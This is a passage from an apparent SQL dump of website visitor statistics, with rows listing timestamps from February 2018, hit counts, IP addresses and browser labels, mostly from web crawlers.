,'66.249.73.24',''),(212691,1519519928,1,1,0,0,'213.79.8.238','firefox'),(212692,1519520278,1,1,0,0,'54.36.149.99','other'),(212693,1519520465,1,1,0,0,'37.9.113.182','other'),(212694,1519520663,1,1,0,0,'54.36.148.221','other'),(212695,1519520693,1,1,0,0,'54.36.148.131','other'),(212696,1519521243,1,1,0,0,'54.36.149.29','other'),(212697,1519521527,1,1,0,0,'141.8.142.74','other'),(212698,1519521672,1,1,0,0,'54.36.148.60','other'),(212699,1519521833,1,1,0,0,'54.36.149.58','other'),(212700,1519521915,1,1,0,0,'54.36.149.71','other'),(212701,1519522046,1,1,0,0,'54.36.149.3','other'),(212702,1519522440,1,1,0,0,'8.29.198.25','other'),(212703,1519522675,1,1,0,0,'54.36.148.230','other'),(212704,1519522676,1,1,0,0,'54.36.148.131','other'),(212705,1519522678,1,1,0,0,'54.36.148.227','other'),(212706,1519522828,1,1,0,0,'54.36.148.213','other'),(212707,1519522993,1,1,0,0,'54.36.148.24','other'),(212708,1519525094,1,1,0,0,'54.36.148.104','other'),(212709,1519526382,1,0,1,0,'66.249.73.25',''),(212710,1519526966,1,1,0,0,'54.36.148.213','other'),(212711,1519527366,6,6,0,0,'141.8.142.74','other'),(212712,1519527373,1,1,0,0,'87.250.224.46','other'),(212713,1519527380,1,1,0,0,'178.154.171.88','other'),(212714,1519527425,1,1,0,0,'54.36.149.106','other'),(212715,1519527433,1,1,0,0,'54.36.148.142','other'),(212716,1519528195,1,1,0,0,'54.36.149.32','other'),(212717,1519528719,1,1,0,0,'54.36.149.90','other'),(212718,1519529038,1,1,0,0,'54.36.148.65','other'),(212719,1519529130,1,1,0,0,'54.36.148.255','other'),(212720,1519529157,1,1,0,0,'54.36.148.146','other'),(212721,1519529366,1,1,0,0,'40.77.167.42','other'),(212722,1519529398,1,1,0,0,'54.36.148.155','other'),(212723,1519529537,3,3,0,0,'78.158.28.10','other'),(212724,1519529794,1,1,0,0,'54.36.148.88','other'),(212725,1519530308,1,1,0,0,'54.36.148.87','other'),(212726,1519530727,1,1,0,0,'54.36.148.249','other'),(212727,1519531069,1,1,0,0,'54.236.8.60','other'),(212728,1519531167,1,1,0,0,'54.36.149.54','other'),(212729,1519531626,1,1,0,0,'54.36.148.253','other'),(212730,1519532450,1,1,0,0,'54.36.149.37','other'),(212731,1519532651,1,1,0,0,'66.249.66.157','chrome'),(212732,1519532692,1,1,0,0,'54.36.148.132','other'),(212733,1519532851,1,1,0,0,'54.236.8.60','other'),(212734,1519532865,1,1,0,0,'54.36.148.110','other'),(212735,1519533136,1,1,0,0,'54.36.149.73','other'),(212736,1519533275,1,1,0,0,'8.29.198.27','other'),(212737,1519533565,1,1,0,0,'54.36.148.28','other'),(212738,1519533735,1,1,0,0,'54.36.148.55','other'),(212739,1519533837,1,1,0,0,'54.236.8.60','other'),(212740,1519534282,1,1,0,0,'54.36.148.234','other'),(212741,1519534349,1,1,0,0,'141.8.142.74','other'),(212742,1519534567,1,1,0,0,'94.179.209.153','other'),(212743,1519534810,1,1,0,0,'54.36.148.237','other'),(212744,1519534851,1,1,0,0,'40.77.167.42','other'),(212745,1519534983,1,1,0,0,'54.36.148.34','other'),(212746,1519535417,1,1,0,0,'178.154.171.88','other'),(212747,1519535439,1,1,0,0,'54.36.148.106','other'),(212748,1519535516,1,1,0,0,'54.236.8.60','other'),(212749,1519535577,1,1,0,0,'54.36.149.69','other'),(212750,1519536097,1,1,0,0,'54.36.148.197','other'),(212751,1519536480,1,1,0,0,'54.36.148.55','other'),(212752,1519536864,1,1,0,0,'54.36.149.1','other'),(212753,1519536994,1,1,0,0,'54.36.148.184','other'),(212754,1519537191,1,1,0,0,'54.236.8.60','other'),(212755,1519537486,1,1,0,0,'54.36.148.61','other'),(212756,1519537655,1,1,0,0,'54.36.148.46','other'),(212757,1519537691,21,21,0,0,'195.201.30.207','other'),(212758,1519537860,1,1,0,0,'94.180.150.114','msie'),(212759,1519538129,1,1,0,0,'54.236.8.60','other'),(212760,1519538158,1,1,0,0,'54.36.149.96','other'),(212761,1519538182,1,1,0,0,'54.36.149.74','other'),(212762,1519538192,1,1,0,0,'54.36.148.235','other'),(212763,1519538248,1,1,0,0,'54.36.149.53','other'),(212764,1519538297,1,1,0,0,'54.36.148.182','other'),(212765,1519538301,1,1,0,0,'54.36.149.93','other'),(212766,1519538409,1,1,0,0,'54.36.148.143','other'),(212767,1519538450,1,1,0,0,'54.36.148.73','other'),(212768,1519538705,1,1,0,0,'54.36.148.22','other'),(212769,1519538706,5,5,0,0,'141.8.142.74','other'),(212770,1519538709,1,1,0,0,'87.250.224.46','other'),(212771,1519539084,1,1,0,0,'54.36.148.184','other'),(212772,1519539245,1,1,0,0,'54.36.148.122','other'),(212773,1519539387,1,1,0,0,'54.36.149.89','other'),(212774,1519539794,1,1,0,0,'54.36.149.94','other'),(212775,1519540102,1,1,0,0,'54.36.148.87','other'),(212776,1519540131,1,1,0,0,'180.76.15.148','other'),(212777,1519540812,1,1,0,0,'91.196.178.35','chrome'),(212778,1519540837,1,1,0,0,'141.8.142.74','other'),(212779,1519540862,1,1,0,0,'54.36.149.41','other'),(212780,1519542330,1,1,0,0,'54.36.148.15','other'),(212781,1519542673,1,1,0,0,'54.36.148.22','other'),(212782,1519543452,1,1,0,0,'54.36.148.177','other'),(212783,1519543899,1,1,0,0,'54.36.149.36','other'),(212784,1519544026,1,1,0,0,'54.36.149.33','other'),(212785,1519544113,1,1,0,0,'8.29.198.27','other'),(212786,1519544564,1,1,0,0,'54.36.149.35','other'),(212787,1519545109,1,1,0,0,'54.36.148.241','other'),(212788,1519545323,1,1,0,0,'54.36.148.38','other'),(212789,1519545746,1,1,0,0,'54.36.148.205','other'),(212790,1519546090,1,1,0,0,'54.36.149.25','other'),(212791,1519546367,1,1,0,0,'54.36.149.91','other'),(212792,1519546370,1,1,0,0,'54.36.149.89','other'),(212793,1519546506,1,1,0,0,'157.55.39.71','other'),(212794,1519546551,1,1,0,0,'54.36.149.76','other'),(212795,1519546965,1,1,0,0,'54.36.148.89','other'),(212796,1519547099,1,1,0,0,'54.36.149.50','other'),(212797,1519547125,1,1,0,0,'54.36.149.57','other'),(212798,1519547265,1,1,0,0,'54.36.148.118','other'),(212799,1519547372,1,1,0,0,'54.36.148.229','other'),(212800,1519547636,1,1,0,0,'66.249.66.75','chrome'),(212801,1519547809,1,1,0,0,'54.36.148.133','other'),(212802,1519549124,1,1,0,0,'54.36.149.28','other'),(212803,1519549194,1,1,0,0,'54.36.148.60','other'),(212804,1519549279,1,1,0,0,'54.36.148.67','other'),(212805,1519549612,1,1,0,0,'178.154.171.88','other'),(212806,1519549919,1,1,0,0,'66.249.66.156','chrome'),(212807,1519549978,1,1,0,0,'92.113.188.43','chrome'),(212808,1519550337,1,1,0,0,'54.36.148.96','other'),(212809,1519550411,1,1,0,0,'54.36.148.252','other'),(212810,1519550444,1,1,0,0,'54.36.148.33','other'),(212811,1519550586,1,1,0,0,'54.36.149.85','other'),(212812,1519550744,1,1,0,0,'54.36.148.188','other'),(212813,1519551016,1,1,0,0,'54.36.149.80','other'),(212814,1519551107,1,1,0,0,'54.36.149.76','other'),(212815,1519551262,1,1,0,0,'54.36.149.89','other'),(212816,1519551277,1,1,0,0,'54.36.148.83','other'),(212817,1519551619,1,1,0,0,'54.36.148.121','other'),(212818,1519552337,1,1,0,0,'54.36.148.254','other'),(212819,1519552587,1,1,0,0,'54.36.148.216','other'),(212820,1519553129,1,1,0,0,'54.36.149.16','other'),(212821,1519553150,1,1,0,0,'54.36.148.97','other'),(212822,1519553199,1,1,0,0,'54.36.148.17','other'),(212823,1519553201,1,1,0,0,'54.36.148.16','other'),(212824,1519553755,1,1,0,0,'93.72.17.232','chrome'),(212825,1519553812,1,1,0,0,'66.249.66.155','chrome'),(212826,1519553825,1,1,0,0,'91.196.178.166','chrome'),(212827,1519554426,1,1,0,0,'54.36.148.226','other'),(212828,1519554713,1,1,0,0,'54.36.148.242','other'),(212829,1519554862,1,1,0,0,'54.36.149.98','other'),(212830,1519554947,1,1,0,0,'8.29.198.26','other'),(212831,1519555213,1,1,0,0,'157.55.39.211','other'),(212832,1519555474,1,1,0,0,'54.36.148.83','other'),(212833,1519555511,3,3,0,0,'141.8.142.74','other'),(212834,1519556287,1,1,0,0,'157.55.39.91','other'),(212835,1519556743,1,1,0,0,'54.36.149.86','other'),(212836,1519556855,1,1,0,0,'54.36.149.31','other'),(212837,1519556998,1,1,0,0,'54.36.148.112','other'),(212838,1519557040,1,1,0,0,'54.36.148.188','other'),(212839,1519557123,1,1,0,0,'54.36.148.175','other'),(212840,1519557462,1,1,0,0,'54.36.149.48','other'),(212841,1519558262,1,1,0,0,'54.36.149.99','other'),(212842,1519558636,1,1,0,0,'54.36.149.107','other'),(212843,1519558637,1,1,0,0,'54.36.148.216','other'),(212844,1519558640,1,1,0,0,'54.36.149.51','other'),(212845,1519558899,1,1,0,0,'54.36.148.248','other'),(212846,1519559892,1,1,0,0,'54.36.148.247','other'),(212847,1519559936,1,1,0,0,'141.8.142.74','other'),(212848,1519559939,1,1,0,0,'178.154.171.88','other'),(212849,1519560017,1,1,0,0,'90.154.88.211','chrome'),(212850,1519560190,1,1,0,0,'54.36.148.158','other'),(212851,1519560368,1,1,0,0,'54.36.148.125','other'),(212852,1519561010,1,1,0,0,'141.8.142.74','other'),(212853,1519561058,1,1,0,0,'54.36.148.86','other'),(212854,1519561143,1,1,0,0,'54.36.148.84','other'),(212855,1519561678,1,1,0,0,'54.36.148.231','other'),(212856,1519562359,1,1,0,0,'54.36.148.27','other'),(212857,1519562539,1,1,0,0,'54.36.148.204','other'),(212858,1519562548,1,1,0,0,'54.36.148.12','other'),(212859,1519562658,1,1,0,0,'54.36.148.18','other'),(212860,1519562774,1,1,0,0,'54.36.148.85','other'),(212861,1519562825,1,1,0,0,'54.36.148.21','other'),(212862,1519563048,1,1,0,0,'217.69.133.242','other'),(212863,1519563581,1,1,0,0,'95.132.48.119','firefox'),(212864,1519563710,1,1,0,0,'54.36.149.31','other'),(212865,1519563816,1,1,0,0,'141.8.142.74','other'),(212866,1519564232,1,1,0,0,'188.230.43.254','other'),(212867,1519564332,1,1,0,0,'54.36.149.62','other'),(212868,1519564583,1,1,0,0,'54.36.148.14','other'),(212869,1519565402,1,0,1,0,'66.249.66.74',''),(212870,1519565649,1,1,0,0,'95.132.42.198','opera'),(212871,1519565794,1,1,0,0,'8.29.198.27','other'),(212872,1519565833,1,0,1,0,'66.249.66.157',''),(212873,1519566110,1,0,1,0,'66.249.66.75',''),(212874,1519566601,1,1,0,0,'54.36.148.24','other'),(212875,1519566626,1,1,0,0,'188.230.43.254','other'),(212876,1519567356,1,1,0,0,'54.36.149.45','other'),(212877,1519567994,1,1,0,0,'54.36.148.231','other'),(212878,1519568182,1,1,0,0,'157.55.39.207','other'),(212879,1519568489,1,1,0,0,'54.36.148.66','other'),(212880,1519568525,2,2,0,0,'93.77.230.142','other'),(212881,1519568658,1,1,0,0,'54.36.149.89','other'),(212882,1519569027,1,1,0,0,'188.230.43.254','other'),(212883,1519569124,1,1,0,0,'54.36.148.125','other'),(212884,1519569232,1,0,1,0,'66.249.66.155',''),(212885,1519569320,1,1,0,0,'178.154.171.88','other'),(212886,1519569528,1,1,0,0,'141.8.142.74','other'),(212887,1519569736,1,1,0,0,'54.36.149.74','other'),(212888,1519569932,1,1,0,0,'54.36.148.228','other'),(212889,1519570371,1,1,0,0,'54.36.149.106','other'),(212890,1519570676,1,1,0,0,'54.36.148.42','other'),(212891,1519570716,1,1,0,0,'54.36.148.110','other'),(212892,1519570741,1,1,0,0,'178.154.171.88','other'),(212893,1519571166,1,1,0,0,'54.36.148.120','other'),(212894,1519571411,1,1,0,0,'54.36.149.7','other'),(212895,1519571425,1,1,0,0,'188.230.43.254','other'),(212896,1519571591,1,1,0,0,'54.36.148.126','other'),(212897,1519571936,1,1,0,0,'54.36.148.247','other'),(212898,1519572001,1,1,0,0,'54.36.148.170','other'),(212899,1519572386,1,1,0,0,'54.36.149.15','other'),(212900,1519572673,1,1,0,0,'54.36.149.100','other'),(212901,1519572681,1,1,0,0,'178.214.161.17','chrome'),(212902,1519572779,1,1,0,0,'54.36.148.64','other'),(212903,1519573443,1,1,0,0,'54.36.149.71','other'),(212904,1519573488,1,1,0,0,'95.132.3.22','firefox'),(212905,1519573579,1,1,0,0,'54.36.148.12','other'),(212906,1519573826,1,1,0,0,'188.230.43.254','other'),(212907,1519574797,1,1,0,0,'54.36.148.172','other'),(212908,1519574834,1,1,0,0,'54.36.148.147','other'),(212909,1519575548,1,1,0,0,'54.36.148.187','other'),(212910,1519575805,1,1,0,0,'141.8.142.74','other'),(212911,1519575981,1,1,0,0,'54.36.148.230','other'),(212912,1519576007,1,1,0,0,'54.36.149.74','other'),(212913,1519576225,1,1,0,0,'188.230.43.254','other'),(212914,1519576374,2,2,0,0,'91.196.178.33','chrome'),(212915,1519576478,1,1,0,0,'54.36.148.137','other'),(212916,1519576635,1,1,0,0,'8.29.198.25','other'),(212917,1519576704,1,1,0,0,'178.154.171.88','other'),(212918,1519576952,1,1,0,0,'46.188.22.189','msie'),(212919,1519576964,1,1,0,0,'54.36.148.32','other'),(212920,1519577529,6,6,0,0,'141.8.142.74','other'),(212921,1519577629,2,2,0,0,'178.154.171.88','other'),(212922,1519577635,3,3,0,0,'87.250.224.46','other'),(212923,1519577900,1,1,0,0,'54.36.149.9','other'),(212924,1519579505,1,1,0,0,'141.8.142.74','other'),(212925,1519579931,1,1,0,0,'54.36.148.52','other'),(212926,1519580701,1,1,0,0,'217.69.143.56','other'),(212927,1519580764,1,1,0,0,'87.250.224.46','other'),(212928,1519581160,1,1,0,0,'54.36.148.163','other'),(212929,1519582259,1,1,0,0,'54.36.149.53','other'),(212930,1519582417,1,1,0,0,'54.36.149.43','other'),(212931,1519582982,1,1,0,0,'54.36.148.139','other'),(212932,1519583213,1,1,0,0,'54.165.59.7','other'),(212933,1519583678,1,1,0,0,'54.36.149.87','other'),(212934,1519583717,1,1,0,0,'141.8.142.74','other'),(212935,1519583753,1,1,0,0,'94.153.231.74','chrome'),(212936,1519583836,1,1,0,0,'54.36.148.74','other'),(212937,1519583955,1,1,0,0,'54.36.148.120','other'),(212938,1519584419,1,1,0,0,'54.36.149.103','other'),(212939,1519584987,1,1,0,0,'54.36.148.150','other'),(212940,1519585426,1,1,0,0,'54.36.149.40','other'),(212941,1519585435,1,1,0,0,'54.36.148.142','other'),(212942,1519586332,1,1,0,0,'54.36.148.122','other'),(212943,1519586364,1,1,0,0,'178.154.171.88','other'),(212944,1519586518,1,1,0,0,'141.8.142.74','other'),(212945,1519587478,1,1,0,0,'8.29.198.26','other'),(212946,1519587511,2,2,0,0,'207.46.13.141','other'),(212947,1519587600,1,1,0,0,'141.8.142.74','other'),(212948,1519588138,1,1,0,0,'54.36.148.50','other'),(212949,1519588503,1,1,0,0,'54.36.149.41','other'),(212950,1519588529,1,1,0,0,'54.36.148.213','other'),(212951,1519589416,1,1,0,0,'54.36.148.10','other'),(212952,1519589475,1,1,0,0,'77.111.244.55','chrome'),(212953,1519589563,1,1,0,0,'54.36.149.63','other'),(212954,1519589988,1,1,0,0,'141.8.142.74','other'),(212955,1519590374,1,1,0,0,'147.135.128.113','other'),(212956,1519590884,1,1,0,0,'54.36.148.104','other'),(212957,1519590885,1,1,0,0,'157.55.39.211','other'),(212958,1519591218,1,1,0,0,'199.30.24.149','other'),(212959,1519591380,1,1,0,0,'54.36.148.120','other'),(212960,1519591883,1,1,0,0,'54.36.149.51','other'),(212961,1519591908,1,1,0,0,'94.240.162.167','firefox'),(212962,1519592026,2,2,0,0,'91.196.178.163','chrome'),(212963,1519592043,1,0,1,0,'66.249.66.157',''),(212964,1519592400,1,1,0,0,'54.36.149.21','other'),(212965,1519592621,1,1,0,0,'54.36.149.30','other'),(212966,1519592647,1,1,0,0,'54.36.149.24','other'),(212967,1519592671,1,1,0,0,'54.36.148.218','other'),(212968,1519592675,1,1,0,0,'54.36.148.192','other'),(212969,1519593160,2,0,2,0,'66.249.66.157',''),(212970,1519593249,1,1,0,0,'54.36.148.195','other'),(212971,1519593261,1,0,1,0,'66.249.66.75',''),(212972,1519593274,1,0,1,0,'66.249.66.74',''),(212973,1519593366,11,11,0,0,'23.237.4.26','other'),(212974,1519593665,1,1,0,0,'54.36.148.223','other'),(212975,1519593801,1,1,0,0,'54.165.59.7','other'),(212976,1519593818,1,1,0,0,'54.36.148.74','other'),(212977,1519594227,1,1,0,0,'54.36.148.34','other'),(212978,1519594240,1,1,0,0,'54.36.148.35','other'),(212979,1519594822,1,1,0,0,'54.36.148.229','other'),(212980,1519595342,1,1,0,0,'54.36.148.84','other'),(212981,1519595627,1,1,0,0,'54.36.148.14','other'),(212982,1519596031,78,78,0,0,'147.135.128.113','other'),(212983,1519597121,1,1,0,0,'54.36.148.45','other'),(212984,1519597360,1,1,0,0,'141.8.142.74','other'),(212985,1519597796,1,1,0,0,'54.36.149.64','other'),(212986,1519597955,1,1,0,0,'54.36.148.239','other'),(212987,1519598306,1,1,0,0,'54.36.149.45','other'),(212988,1519598319,1,1,0,0,'8.29.198.25','other'),(212989,1519599214,1,1,0,0,'54.36.149.89','other'),(212990,1519599545,1,1,0,0,'54.36.149.7','other'),(212991,1519599979,1,1,0,0,'54.36.148.119','other'),(212992,1519600543,1,1,0,0,'54.36.148.99','other'),(212993,1519600770,1,1,0,0,'54.36.148.60','other'),(212994,1519600865,1,1,0,0,'54.36.148.253','other'),(212995,1519600956,1,1,0,0,'54.36.148.168','other'),(212996,1519601236,1,1,0,0,'54.36.149.85','other'),(212997,1519601316,1,1,0,0,'66.249.66.155','chrome'),(212998,1519602293,1,1,0,0,'54.36.149.85','other'),(212999,1519602410,1,1,0,0,'54.36.149.1','other'),(213000,1519602537,1,1,0,0,'199.58.86.206','other'),(213001,1519602764,1,1,0,0,'54.36.149.59','other'),(213002,1519603290,1,1,0,0,'213.180.203.8','other'),(213003,1519603325,1,1,0,0,'54.36.148.251','other'),(213004,1519603366,1,1,0,0,'180.76.15.152','other'),(213005,1519603574,146,146,0,0,'147.135.128.113','other'),(213006,1519604140,1,1,0,0,'141.8.142.74','other'),(213007,1519604305,1,1,0,0,'54.36.148.156','other'),(213008,1519604392,1,1,0,0,'54.36.149.57','other'),(213009,1519604475,147,147,0,0,'147.135.128.113','other'),(213010,1519604635,1,1,0,0,'54.36.148.195','other'),(213011,1519604763,1,1,0,0,'54.36.148.209','other'),(213012,1519604827,3,3,0,0,'178.154.171.88','other'),(213013,1519604961,1,1,0,0,'54.36.148.149','other'),(213014,1519605088,6,6,0,0,'141.8.142.74','other'),(213015,1519605381,126,126,0,0,'147.135.128.113','other'),(213016,1519605460,1,1,0,0,'54.36.149.5','other'),(213017,1519606284,130,130,0,0,'147.135.128.113','other'),(213018,1519606367,1,1,0,0,'141.8.142.74','other'),(213019,1519606382,1,1,0,0,'54.36.149.74','other'),(213020,1519606418,1,1,0,0,'54.36.148.200','other'),(213021,1519607185,95,95,0,0,'147.135.128.113','other'),(213022,1519607310,1,1,0,0,'54.36.148.178','other'),(213023,1519608055,1,1,0,0,'54.36.148.54','other'),(213024,1519608702,1,1,0,0,'54.36.149.27','other'),(213025,1519608993,2,2,0,0,'141.8.142.74','other'),(213026,1519609745,1,1,0,0,'8.29.198.25','other'),(213027,1519609976,1,1,0,0,'180.76.15.156','other'),(213028,1519610162,1,1,0,0,'54.36.149.58','other'),(213029,1519610422,1,1,0,0,'54.36.149.91','other'),(213030,1519610438,4,4,0,0,'141.8.142.74','other'),(213031,1519610448,1,1,0,0,'178.154.171.88','other'),(213032,1519610855,1,1,0,0,'54.36.149.49','other'),(213033,1519611319,1,1,0,0,'54.36.149.55','other'),(213034,1519611622,1,1,0,0,'54.36.148.65','other'),(213035,1519612290,4,4,0,0,'141.8.142.74','other'),(213036,1519612293,2,2,0,0,'178.154.171.88','other'),(213037,1519612296,1,1,0,0,'87.250.224.46','other'),(213038,1519612394,1,1,0,0,'54.36.148.43','other'),(213039,1519612406,1,1,0,0,'54.36.149.88','other'),(213040,1519612756,1,1,0,0,'54.36.149.69','other'),(213041,1519612928,58,58,0,0,'147.135.128.113','other'),(213042,1519613637,1,1,0,0,'54.36.149.21','other'),(213043,1519613641,1,0,1,0,'66.249.66.155',''),(213044,1519613831,112,112,0,0,'147.135.128.113','other'),(213045,1519613865,1,1,0,0,'141.8.142.74','other'),(213046,1519614084,1,1,0,0,'54.36.148.149','other'),(213047,1519614746,78,78,0,0,'147.135.128.113','other'),(213048,1519614863,1,1,0,0,'54.36.148.237','other'),(213049,1519614916,1,1,0,0,'54.36.148.50','other'),(213050,1519615489,1,1,0,0,'54.36.148.182','other'),(213051,1519616049,1,1,0,0,'54.36.148.91','other'),(213052,1519616065,1,1,0,0,'54.36.148.191','other'),(213053,1519616094,1,1,0,0,'54.36.148.54','other'),(213054,1519616499,1,1,0,0,'54.36.149.39','other'),(213055,1519616545,1,1,0,0,'180.76.15.161','other'),(213056,1519616701,2,2,0,0,'178.154.171.88','other'),(213057,1519616706,3,3,0,0,'141.8.142.74','other'),(213058,1519617039,1,1,0,0,'54.36.149.27','other'),(213059,1519617189,1,1,0,0,'54.36.149.43','other'),(213060,1519617221,1,1,0,0,'54.36.149.65','other'),(213061,1519617343,1,1,0,0,'54.36.149.56','other'),(213062,1519617445,1,1,0,0,'54.36.148.127','other'),(213063,1519617452,1,1,0,0,'54.36.148.115','other'),(213064,1519617580,1,1,0,0,'217.182.194.69','other'),(213065,1519617735,2,2,0,0,'54.165.59.7','other'),(213066,1519618082,1,1,0,0,'54.36.148.199','other'),(213067,1519618238,1,1,0,0,'66.249.66.157','chrome'),(213068,1519618271,1,1,0,0,'188.32.5.224','msie'),(213069,1519619279,1,1,0,0,'54.36.148.187','other'),(213070,1519619476,3,3,0,0,'141.8.142.74','other'),(213071,1519619484,1,1,0,0,'178.154.171.88','other'),(213072,1519619631,1,1,0,0,'54.36.149.72','other'),(213073,1519619638,1,1,0,0,'54.36.148.14','other'),(213074,1519619699,1,0,1,0,'66.249.66.74',''),(213075,1519620556,1,1,0,0,'54.36.148.83','other'),(213076,1519620664,1,1,0,0,'54.36.148.133','other'),(213077,1519620759,1,1,0,0,'8.29.198.26','other'),(213078,1519620978,1,1,0,0,'54.36.148.22','other'),(213079,1519621552,1,1,0,0,'141.8.142.74','other'),(213080,1519621873,1,1,0,0,'54.36.149.53','other'),(213081,1519621924,1,1,0,0,'54.36.149.56','other'),(213082,1519622952,2,2,0,0,'95.135.213.211','chrome'),(213083,1519623144,1,1,0,0,'54.36.148.157','other'),(213084,1519624007,3,3,0,0,'141.8.142.74','other'),(213085,1519624127,1,1,0,0,'87.250.224.46','other'),(213086,1519624149,2,2,0,0,'178.154.171.88','other'),(213087,1519625229,1,1,0,0,'54.36.148.56','other'),(213088,1519625824,1,1,0,0,'77.111.244.15','chrome'),(213089,1519626007,1,1,0,0,'54.36.149.30','other'),(213090,1519626142,3,3,0,0,'141.8.142.74','other'),(213091,1519626242,1,1,0,0,'91.196.177.8','chrome'),(213092,1519626652,1,1,0,0,'54.36.148.189','other'),(213093,1519626657,1,1,0,0,'54.36.148.127','other'),(213094,1519626728,1,1,0,0,'54.36.148.194','other'),(213095,1519627178,1,1,0,0,'54.36.148.88','other'),(213096,1519627281,1,1,0,0,'54.36.149.14','other'),(213097,1519628169,1,1,0,0,'54.36.148.199','other'),(213098,1519628401,1,1,0,0,'178.95.195.80','firefox'),(213099,1519628541,1,1,0,0,'89.222.164.32','chrome'),(213100,1519629551,1,1,0,0,'54.36.148.202','other'),(213101,1519629628,1,1,0,0,'91.196.178.104','chrome'),(213102,1519629811,1,1,0,0,'37.55.240.178','chrome'),(213103,1519629861,1,1,0,0,'54.36.148.68','other'),(213104,1519630547,1,1,0,0,'178.154.171.88','other'),(213105,1519630739,2,2,0,0,'91.196.178.93','chrome'),(213106,1519630809,1,1,0,0,'54.36.148.225','other'),(213107,1519630920,1,1,0,0,'40.77.167.89','other'),(213108,1519631098,1,1,0,0,'62.122.207.77','chrome'),(213109,1519631617,1,1,0,0,'8.29.198.25','other'),(213110,1519631748,7,7,0,0,'217.110.97.166','other'),(213111,1519632113,3,3,0,0,'95.133.192.24','chrome'),(213112,1519632613,2,2,0,0,'46.174.163.134','chrome'),(213113,1519632631,1,1,0,0,'207.46.13.78','other'),(213114,1519632748,1,1,0,0,'77.111.244.36','chrome'),(213115,1519632886,1,1,0,0,'54.36.148.61','other'),(213116,1519632913,1,1,0,0,'54.36.148.110','other'),(213117,1519632920,1,1,0,0,'54.36.149.63','other'),(213118,1519632927,1,1,0,0,'54.36.148.56','other'),(213119,1519632931,1,1,0,0,'37.53.65.84','chrome'),(213120,1519633076,1,1,0,0,'54.36.148.25','other'),(213121,1519633425,2,2,0,0,'195.230.119.34','chrome'),(213122,1519633502,1,1,0,0,'54.36.148.211','other'),(213123,1519633634,1,1,0,0,'91.196.177.110','chrome'),(213124,1519633644,1,1,0,0,'54.36.148.35','other'),(213125,1519633808,1,1,0,0,'54.36.149.74','other'),(213126,1519633909,1,1,0,0,'141.8.142.74','other'),(213127,1519633937,1,1,0,0,'54.36.148.13','other'),(213128,1519634186,1,1,0,0,'144.76.38.73','other'),(213129,1519634577,1,1,0,0,'54.36.148.246','other'),(213130,1519634757,1,1,0,0,'54.36.149.41','other'),(213131,1519634861,1,1,0,0,'213.5.192.96','chrome'),(213132,1519634937,1,1,0,0,'54.36.148.131','other'),(213133,1519634957,1,1,0,0,'54.36.149.2','other'),(213134,1519635049,1,1,0,0,'54.36.148.21','other'),(213135,1519635085,1,1,0,0,'91.211.135.105','chrome'),(213136,1519635444,1,1,0,0,'212.129.28.157','other'),(213137,1519635466,2,2,0,0,'91.196.178.73','chrome'),(213138,1519636083,4,4,0,0,'94.153.229.229','chrome'),(213139,1519636236,1,1,0,0,'91.196.177.46','firefox'),(213140,1519636566,78,78,0,0,'217.182.194.69','other'),(213141,1519636963,1,1,0,0,'95.132.20.185','firefox'),(213142,1519637299,1,1,0,0,'130.180.216.240','chrome'),(213143,1519637525,1,1,0,0,'91.196.178.104','firefox'),(213144,1519637862,1,1,0,0,'178.95.154.240','firefox'),(213145,1519638562,1,1,0,0,'95.133.192.24','chrome'),(213146,1519638739,1,1,0,0,'91.196.178.104','firefox'),(213147,1519639059,1,1,0,0,'178.219.88.24','chrome'),(213148,1519639167,1,1,0,0,'195.10.210.70','chrome'),(213149,1519639303,1,1,0,0,'178.62.137.173','chrome'),(213150,1519639637,1,1,0,0,'87.250.224.46','other'),(213151,1519639726,1,1,0,0,'54.36.149.10','other'),(213152,1519639867,1,1,0,0,'141.8.142.74','other'),(213153,1519639953,1,1,0,0,'178.154.171.88','other'),(213154,1519640020,3,3,0,0,'91.196.178.73','chrome'),(213155,1519640717,1,1,0,0,'54.36.148.243','other'),(213156,1519640724,1,1,0,0,'54.36.148.74','other'),(213157,1519640860,1,1,0,0,'130.180.217.88','chrome'),(213158,1519640926,1,1,0,0,'213.5.192.96','chrome'),(213159,1519640969,1,1,0,0,'157.55.39.161','other'),(213160,1519641527,1,0,1,0,'66.249.66.156',''),(213161,1519641595,1,1,0,0,'66.249.66.75','chrome'),(213162,1519641610,1,1,0,0,'207.46.13.7','other'),(213163,1519641666,1,1,0,0,'54.36.149.81','other'),(213164,1519641699,1,1,0,0,'54.36.149.104','other'),(213165,1519641736,1,1,0,0,'66.249.66.155','chrome'),(213166,1519641948,2,2,0,0,'130.180.217.192','chrome'),(213167,1519642489,1,1,0,0,'8.29.198.27','other'),(213168,1519642517,1,1,0,0,'54.36.148.83','other'),(213169,1519642539,1,1,0,0,'46.211.67.213','chrome'),(213170,1519643447,1,1,0,0,'54.36.148.221','other'),(213171,1519643934,1,1,0,0,'195.10.210.70','chrome'),(213172,1519644552,2,2,0,0,'130.180.220.184','chrome'),(213173,1519644966,1,1,0,0,'77.222.134.101','chrome'),(213174,1519647768,4,4,0,0,'141.8.142.74','other'),(213175,1519647773,1,1,0,0,'178.154.171.88','other'),(213176,1519648383,1,1,0,0,'213.108.45.138','firefox'),(213177,1519648626,1,1,0,0,'91.196.178.6','chrome'),(213178,1519648627,2,0,2,0,'66.249.66.156',''),(213179,1519648793,1,1,0,0,'46.133.90.133','chrome'),(213180,1519648919,1,1,0,0,'92.113.190.154','chrome'),(213181,1519649349,2,2,0,0,'141.8.142.74','other'),(213182,1519649638,1,1,0,0,'37.115.96.26','chrome'),(213183,1519649651,1,1,0,0,'213.108.45.138','firefox'),(213184,1519649796,1,1,0,0,'180.76.15.23','other'),(213185,1519649979,1,1,0,0,'178.92.125.245','chrome'),(213186,1519650097,1,1,0,0,'157.55.39.179','other'),(213187,1519650656,2,2,0,0,'82.196.9.227','chrome'),(213188,1519650669,1,1,0,0,'91.196.178.104','chrome'),(213189,1519650758,2,2,0,0,'77.111.246.8','chrome'),(213190,1519650831,2,2,0,0,'37.9.113.182','other'),(213191,1519650834,4,4,0,0,'141.8.142.74','other'),(213192,1519650850,1,1,0,0,'94.179.9.0','chrome'),(213193,1519651050,1,1,0,0,'178.154.171.88','other'),(213194,1519651281,2,2,0,0,'91.196.178.73','chrome'),(213195,1519651668,1,1,0,0,'91.196.177.129','firefox'),(213196,1519652257,1,1,0,0,'207.46.13.33','other'),(213197,1519652283,1,1,0,0,'194.0.148.100','firefox'),(213198,1519652292,1,1,0,0,'193.34.93.69','chrome'),(213199,1519652992,3,3,0,0,'212.90.63.71','chrome'),(213200,1519653215,2,2,0,0,'91.196.178.73','chrome'),(213201,1519653377,1,1,0,0,'8.29.198.27','other'),(213202,1519653505,1,1,0,0,'213.108.45.138',